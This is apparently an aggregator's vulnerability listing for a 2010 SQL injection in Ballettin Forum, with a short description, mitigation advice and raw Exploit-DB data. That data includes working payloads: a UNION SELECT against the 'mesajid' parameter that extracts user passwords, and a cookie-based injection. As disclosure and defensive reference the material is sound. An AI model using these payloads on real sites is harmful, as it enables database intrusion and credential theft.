Ballettin Forum Multiple SQL Injection Vulnerability

vendor:

Forum

by:

3v0 aka evolution

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Forum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Pack 3

2010

Ballettin Forum Multiple SQL Injection Vulnerability

The vulnerability exists due to the lack of proper sanitization of user-supplied input in the 'mesajid' parameter of the 'alinti.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. An attacker can also inject malicious JavaScript code into the 'ballettin' cookie and execute it in the browser of an unsuspecting user.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use parameterized queries (prepared statements) when working with databases.

Source

Exploit-DB raw data:

====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution <evolution ^ darkedition.com>
# Software Link: http://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 - Vulnerable File
------------------------------------------------------
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1

#2 - Insecure Cookie
------------------------------------------------------
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
After go to http://www.site.com/ust.php
====================================================================